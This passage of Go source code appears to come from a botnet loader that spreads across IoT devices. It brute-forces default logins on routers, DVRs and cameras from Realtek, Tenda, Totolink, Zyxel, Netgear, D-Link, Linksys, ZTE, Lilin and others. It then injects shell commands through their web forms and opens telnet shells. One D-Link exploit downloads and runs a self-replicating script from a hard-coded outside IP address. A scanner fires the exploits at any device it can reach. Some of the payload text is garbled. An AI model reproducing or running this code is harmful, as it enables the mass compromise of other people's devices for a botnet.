Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/tools.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n")) zeroByte(rdbuf) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") && strings.Contains(string(rdbuf), "/themes/oem.css") { fmt.Printf("\x1b[38;5;46mHongdian\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i]) conn.Close() payloadSent++ return } } conn.Close() return } else if strings.Contains(string(rdbuf), "HTTP/1.1 401 Unauthorized") { break } } zeroByte(rdbuf) conn.Close() } } func infectFunctionRealtek(target string) { var ( rdbuf []byte = []byte("") logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"} ) for i := 0; i < len(logins); i++ { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } authStr := base64.StdEncoding.EncodeToString([]byte(logins[i])) conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "HTTP/1.1 200") { conn.Close() conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } payload := "submit-url=%2Fsyscmd.htm&sysCmd=ping&sysMagic=&sysCmdType=ping&checkNum=1&sysHost=%3Btelnetd%20-l/bin/sh%20-p31443&apply=Apply&msg=boa.conf%0D%0Amime.types%0D%0A" cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\nReferer: http://" + target + "/syscmd.htm\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n")) zeroByte(rdbuf) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "Redirect") && strings.Contains(string(rdbuf), "/syscmd.htm") { time.Sleep(10 * time.Second) ipslit := strings.Split(target, ":") tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":31443", 10 * time.Second) if err == nil { fmt.Printf("\x1b[38;5;46mRealtek\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i]) tmpconn.Close() } conn.Close() payloadSent++ return } } conn.Close() return } else if strings.Contains(string(rdbuf), "HTTP/1.1 401") { break } } zeroByte(rdbuf) conn.Close() } } func infectFunctionTenda(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /goform/setUsbUnload/.js?deviceName=A;" + tendaPayload + " HTTP/1.1\r\nHost: " + target + "\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "HTTP/1.0 200 OK") && strings.Contains(string(rdbuf), "{\"errCode\":0}") { fmt.Printf("\x1b[38;5;46mTenda\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ break } } conn.Close() } func infectFunctionTotolink(target string) { var ( rdbuf []byte = []byte("") logins []string = []string{"admin:admin", "admin:Soportehfc", "Soportehfc:Soportehfc", "admin:soportehfc", "soportehfc:soportehfc"} ) for i := 0; i < len(logins); i++ { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } authStr := base64.StdEncoding.EncodeToString([]byte(logins[i])) payload := "submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=" payload += totolinkPayload cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("POST /boafrm/formSysCmd HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + authStr + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n" + payload + "\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "Location: http://" + target + "/syscmd.htm") { fmt.Printf("\x1b[38;5;46mTotolink\x1b[38;5;15m: \x1b[38;5;134m%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, logins[i]) payloadSent++ break } } zeroByte(rdbuf) conn.Close() } } func infectFunctionZyxel(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3B" + zyxelPayload + "+%23&password=asdf HTTP/1.1\r\nHost: " + target + "\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozila/5.0\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "errcode:5") { fmt.Printf("\x1b[38;5;46mZyxel\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ break } } zeroByte(rdbuf) conn.Close() } func infectFunctionAlcatel(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /cgi-bin/masterCGI?ping=nomip&user=;" + alcatelPayload + "; HTTP/1.1\r\nHost: " + target + "\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionLilinDvr(target string) { var authPos int = -1 var pathPos int = -1 var logins = [...]string{"root:icatch99", "report:8Jg0SR8K50", "report:report", "root:root", "admin:admin", "admin:123456", "admin:654321", "admin:1111", "admin:admin123", "admin:1234", "admin:12345"} var paths = [...]string{"/dvr/cmd", "/cn/cmd"} for i := 0; i < len(logins); i++ { logins[i] = base64.StdEncoding.EncodeToString([]byte(logins[i])) } cntLen := 292 cntLen += len(lilinPayload) cntLenString := strconv.Itoa(cntLen) bytebuf := make([]byte, 512) for i := 0; i < len(logins); i++ { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { break } conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nAuthorization: Basic " + logins[i] + "\r\n\r\n")) bytebuf := make([]byte, 2048) l, err := conn.Read(bytebuf) if err != nil || l <= 0 { zeroByte(bytebuf) conn.Close() return } if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) { authPos = i zeroByte(bytebuf) conn.Close() break } else { zeroByte(bytebuf) conn.Close() continue } } if (authPos == -1) { return } for i := 0; i < len(paths); i++ { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { break } conn.Write([]byte("POST " + paths[i] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: " + cntLenString + "\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n]]>\r\n\r\n")) bytebuf := make([]byte, 2048) l, err := conn.Read(bytebuf) if err != nil || l <= 0 { zeroByte(bytebuf) conn.Close() continue } if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) { pathPos = i zeroByte(bytebuf) conn.Close() fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ break } else { zeroByte(bytebuf) conn.Close() continue } } if (pathPos != -1) { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("POST " + paths[pathPos] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 281\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n]]>\r\n\r\n")) bytebuf = make([]byte, 2048) l, err := conn.Read(bytebuf) if err != nil || l <= 0 { zeroByte(bytebuf) conn.Close() return } if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) { fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ } zeroByte(bytebuf) conn.Close() } return } func infectFunctionLinksys(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 102 cntLen += len(linksysPayload) cntLneStr := strconv.Itoa(cntLen) conn.Write([]byte("POST /tmUnblock.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + cntLneStr + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsubmit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60" + linksysPayload + "%60&StartEPI=1\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } if strings.Contains(string(tmpbuf), "200") || strings.Contains(string(tmpbuf), "301") || strings.Contains(string(tmpbuf), "302") { fmt.Printf("\x1b[38;5;46mLinksys\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) } zeroByte(rdbuf) conn.Close() } func infectFunctionMagic(target string) { ipslit := strings.Split(target, ":") for i := 0; i < len(magicPorts); i++ { portVal := strconv.Itoa(magicPorts[i]) magicGroup.Add(1) go infectFunctionMagicProto(ipslit[0] + ":" + portVal) } magicGroup.Wait() } func infectFunctionDlink(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } rand.Seed(time.Now().UnixNano()) telnetPort := rand.Intn(50000) + 10000 conn.Write([]byte("POST /command.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\n\r\ncmd=telnetd%20-p%20" + strconv.Itoa(telnetPort) + "\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } time.Sleep(10 * time.Second) ipslit := strings.Split(target, ":") go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderDlinkTag) go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mpsl", loaderDlinkTag) go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm7", loaderDlinkTag) go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm", loaderDlinkTag) zeroByte(rdbuf) conn.Close() } func infectFunctionZyxelTwo(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 119 cntLen += len(zyxelPayloadTwo) conn.Write([]byte("POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozia/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3B" + zyxelPayloadTwo + "%3B%23&remoteSubmit=Save^[[A\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionNetgear(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 42 cntLen += len(netgearPayload) conn.Write([]byte("POST /dnslookup.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nhost_name=www.google.com%3B+" + netgearPayload + "&lookup=Lookup\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionZte(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 80 cntLen += len(ztePayload) conn.Write([]byte("POST /web_shell_cmd.gch HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=" + ztePayload + "&CmdAck=\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionNetgearTwo(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /None?writeData=true®info=0&macAddress=%20001122334455%20-c%200%20;" + netgearPayload + ";%20echo%20 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionNetgearThree(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 81 cntLen += len(netgearPayload) conn.Write([]byte("POST /ping.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nreferer: " + target + "/DIAG_diag.htm\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nIPAddr1=12&IPAddr2=12&IPAddr3=12&IPAddr4=12&ping=Ping&ping_IPAddr=12.12.12.12%3B+" + netgearPayload+ "\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionNetgearFour(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /cgi-bin/;" + netgearPayload + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionGponOG(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 68 cntLen += len(gponOGPayload) conn.Write([]byte("POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%60" + gponOGPayload + "&ipv=0\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionLinksysTwo(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 159 cntLen += len(linksysTwoPayload) conn.Write([]byte("POST /apply.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_size=%26" + linksysTwoPayload + "&ping_times=5&traceroute_ip=127.0.0.1\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionLinksysThree(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 23 cntLen += len(linksysTwoPayload) conn.Write([]byte("POST /debug.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: python-requests/2.21.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA==\r\n\r\ndata1=" + linksysTwoPayload + "&command=ui_debug\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkTwo(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 91 cntLen += len(dlinkTwoPayload) conn.Write([]byte("POST /setSystemCommand HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nAuthorization: Basic YWRtaW46\r\n\r\nReplySuccessPage=docmd.htm&ReplyErrorPage=docmd.htm&SystemCommand=" + dlinkTwoPayload + "&ConfigSystemCommand=Save\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkThree(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } var cntLen int = 20 cntLen += len(dlinkTwoPayload) conn.Write([]byte("POST /diagnostic.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\n\r\nact=ping&dst=%26 " + dlinkTwoPayload + "%26\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkFour(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" + dlinkTwoPayload +";echo%207yeB8BQB2ycGRCT8LmsmttUWPggWykhK; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkFive(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /login.cgi?cli=multilingual%20show';" + dlinkTwoPayload + "'$ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkSix(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nCookie: i=`" + dlinkTwoPayload + "`\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkSeven(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("POST /hedwig.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: uid=uAMwOEeRuqDZptt4JHrQuakNv2g3eR9kqnvDUvAkaRD561YFVty3uXFAls6bcARYA5w5KpUrDlY7pdAXuG0AuhHSfBCQJoPDqxdjszcAWwQYxOEf6Sy9t8iU4PV1xNyVxDMPqZwR7a5dthsW8jLiK0ha1qUksjWYna5IaYoOYIM7aiT3mrseuskJWVONKXFQQw64tNsAAmrfIc9OobZ4gxQibsOsHkZoqz5C1ScGYmMaWeICXuF1J2R1FIzGkXOr3OXjKXQ8C6ZeSbRRmEBF8GaJPJ87wiVlDAXj6QsyKSWDzjqTWqS9rxBnx39xwO9e02kJibbjxAW93SsX7rfKmUH4hN0H1j8dqYGhpPWL0CSELCM7NwWSjs5ofrkRivAE5bI3rnlSsMeyvPGmRjGhSH6Z5kWDAVQ5bUztFAALVyl0nPl9fl2FgmLNCPmqx9VMNMsFTnOfv4hVP9wNiN1WYTeHRCrLeB9THv1uzipH8utX2Y7Cv5iaxSMYZOUVG2puqPAYc2QzfdkEgrIOuIOZIUXQvYGF35rIkMW8eYuiVKqejKbXaM8B6RfiBTCTAHJpRMnkp5L9HorqZNwX6lpyH62slJG4iS3Yz31SrgBV5PDANkFw92G6qtT8kvbHfzoI2kyJKQa67TSDHhZLgfUHMsFFLwZTZwiXlZIzDFimYbdTaz8KWF0POFoqyGs5oynMDic8VvwS2rGsALvVHYWa885i4CIrwyEOnkY6Mqvmv96osjP1Br3GWARZPpnwGoWc7dVLvZVDLW1ObRFg1bX8qDUdxv4jcGGwZdK5wz2bJoNoyEWIkFVcQldDxjaQNdokjCmJxoEGRUGYyZshnx1fYqLH3Mc3K9DcB7xhZdbdBAohXpzYr7OXpTFHZp7THrBE1i8VvvoaF1bBXsBrasf4fwYtVUrtgPHVnlq1oN2uoO6qfLZLz49u1QxK6qBGsQG2pJa6rxYmcHEPt���*vk3aG0Vgy2692qgW�ٰ*crxdla7qucxf�ذ*qzoFOTyzL063ZRDecd /tmp;wget http://37.0.11.220/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh;\r\nContent-Length: 15\r\n\r\nL0PTJUj=NX9zke5\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func infectFunctionDlinkEight(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("POST /HNAP1/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && " + dlinkThreePayload + "`\"\r\nContent-Length: 0\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() } zeroByte(rdbuf) conn.Close() } func scannerAddExploit(name string, function interface{}) { exploitMap[name] = function } func scannerInitExploits() { exploitMap = make(map[string]interface{}) scannerAddExploit("Basic realm=\"DVR\"", infectFunctionLilinDvr) scannerAddExploit("uc-httpd 1.0.0", infectFunctionUchttpd) scannerAddExploit("AuthInfo:", infectFunctionTvt) scannerAddExploit("CMS Web Viewer", infectFunctionMagic) scannerAddExploit("Server: GoAhead-Webs", infectFunctionFiberhome) scannerAddExploit("Server: DWS", infectFunctionVigor) scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionComtrend) scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionBroadcom) scannerAddExploit("Server: Boa/0.93.15", infectFunctionGponFiber) scannerAddExploit("TOTOLINK", infectFunctionTotolink) scannerAddExploit("Server: Boa/0.94.14", infectFunctionRealtek) scannerAddExploit("Basic realm=\"Server Status\"", infectFunctionHongdian) scannerAddExploit("Server: Http Server", infectFunctionTenda) scannerAddExploit(",/playzone,/", infectFunctionZyxel) scannerAddExploit("Linksys E", infectFunctionLinksys) // Exploit spray for devices we cant identify scannerAddExploit("HTTP/1.", infectFunctionAlcatel) scannerAddExploit("HTTP/1.", infectFunctionZyxelTwo) scannerAddExploit("HTTP/1.", infectFunctionZte) scannerAddExploit("HTTP/1.", infectFunctionNetgear) scannerAddExploit("HTTP/1.", infectFunctionNetgearTwo) scannerAddExploit("HTTP/1.", infectFunctionNetgearThree) scannerAddExploit("HTTP/1.", infectFunctionNetgearFour) scannerAddExploit("HTTP/1.", infectFunctionGponOG) scannerAddExploit("HTTP/1.", infectFunctionLinksysTwo) scannerAddExploit("HTTP/1.", infectFunctionLinksysThree) scannerAddExploit("HTTP/1.", infectFunctionDlink) scannerAddExploit("HTTP/1.", infectFunctionDlinkTwo) scannerAddExploit("HTTP/1.", infectFunctionDlinkThree) scannerAddExploit("HTTP/1.", infectFunctionDlinkFour) scannerAddExploit("HTTP/1.", infectFunctionDlinkFive) scannerAddExploit("HTTP/1.", infectFunctionDlinkSix) scannerAddExploit("HTTP/1.", infectFunctionDlinkSeven) scannerAddExploit("HTTP/1.", infectFunctionDlinkEight) } func httpBannerCheck(target string) { conn, err := net.DialTimeout("tcp", target, netTimeout * time.Second) if err != nil { workerGroup.Done() return } conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\n\r\n")) for { bytebuf := make([]byte, 2048) l, err := conn.Read(bytebuf) if err != nil || l <= 0 { zeroByte(bytebuf) conn.Close() workerGroup.Done() return } for key, element := range exploitMap { if strings.Contains(string(bytebuf), key) { switch function := element.(type) { case func(string): function(target) default: break } } } } workerGroup.Done() return } func main() { go func() { i := 0 for { fmt.Printf("%d's | Payload Sent: %d | Telnet Opened: %d\r\n", i, payloadSent, telShells) time.Sleep(1 * time.Second) i++ } } () dropperMap = make(map[string]echoDropper) telnetLoadDroppers() scannerInitExploits() li, err := net.Listen("tcp", "0.0.0.0:" + strconv.Itoa(ucRshellPort)) if err 